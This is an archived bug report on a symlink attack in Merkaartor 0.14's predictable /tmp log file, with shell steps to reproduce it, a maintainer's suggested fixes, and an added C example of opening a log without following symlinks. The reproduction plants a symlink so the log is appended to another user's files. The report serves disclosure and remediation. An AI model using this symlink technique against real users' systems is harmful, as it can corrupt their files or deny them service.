This repository has been archived by the owner on Jul 24, 2021. It is now read-only.
Reporter: bernd[at]bzed.de [Submitted to the original trac issue database at 7.04am, Sunday, 27th September 2009]
[Forwarded from http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=548546]
Found a minor symlink attack in merkaartor. It allows a local attacker
to append the contents of the merkaartor log file to arbitrary files
owned by the user running merkaartor.
It may be used to DoS any applications that require their data files to
be valid before starting.
While no data loss is immediately obvious, it is possible that
corrupting files by appending data could lead other software to destroy
the newly corrupted data. An example of this could be bash. A merkaartor
log file can be fairly long if the user has enabled map tile downloads
and browses a large area and lots of tiles over one map editing session.
Merkaartor would append many lines to the user's bash history and next
time they start bash, their bash history could be larger than bash's
history limit settings, then bash would take the latest lines (all
merkaartor logs) and discard the legitimate bash history.
Steps to reproduce:
pabs@chianamo:~/tmp$ sudo rm -f /tmp/merkaartor.log /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ sudo su -c 'ln -s /home/pabs/tmp/foo.log /tmp/merkaartor.log' nobody
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
ls: cannot access /home/pabs/tmp/foo.log: No such file or directory
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ merkaartor
**** "2009-09-27T11:49:39" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:49:42" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
-rw-r----- 1 pabs pabs 189 2009-09-27 11:49 /home/pabs/tmp/foo.log
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
**** "2009-09-27T11:49:39" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:49:42" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ echo test > foo.log
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
test
pabs@chianamo:~/tmp$ merkaartor
**** "2009-09-27T11:50:20" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:50:24" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
test
**** "2009-09-27T11:50:20" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:50:24" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
-rw-r----- 1 pabs pabs 194 2009-09-27 11:50 /home/pabs/tmp/foo.log
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
Author: bernd[at]bzed.de [Added to the original trac issue at 10.48am, Tuesday, 29th September 2009]
There are two ways to avoid such bugs:
- If you write files into public temp directories, make sure the name is not guessable - use mkstemp for example.
- Put files into a directory which is accessible by the user only.
Another idea would be to allow the user to enable logging and let him choose the
place where the log should go to. Then it is not the software's fault, if the
user has issues with such attacks.
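The user-only directory option from the comment above, together with an open that refuses to follow a symlink at the log path, as an added C example (not Merkaartor's code and not part of the original thread). `ensure_private_dir` and `open_log_nofollow` are hypothetical helper names; the `O_NOFOLLOW` open and the post-open `fstat` check go beyond what the comment proposes, and a POSIX.1-2008 system is assumed.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: create dir with mode 0700 if missing, then verify it
 * is a real directory, owned by us, with no group/other access. */
int ensure_private_dir(const char *dir)
{
    struct stat st;
    if ((mkdir(dir, 0700) != 0 && errno != EEXIST) || lstat(dir, &st) != 0)
        return -1;
    if (!S_ISDIR(st.st_mode) || st.st_uid != geteuid() || (st.st_mode & 077)) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

/* Hypothetical helper: open a log for appending without following a symlink.
 * Returns an fd, or -1 with errno set (ELOOP on Linux if path is a symlink). */
int open_log_nofollow(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;
    /* Validate the object actually opened: regular file, ours, one link. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    int fd = open_log_nofollow(argc > 1 ? argv[1] : "merkaartor-example.log");
    if (fd < 0)
        perror("open_log_nofollow");
    else
        close(fd);
    return fd < 0;
}
```

`O_NOFOLLOW` only covers the final path component, so the log should still live in a directory that passes `ensure_private_dir` rather than directly in `/tmp`.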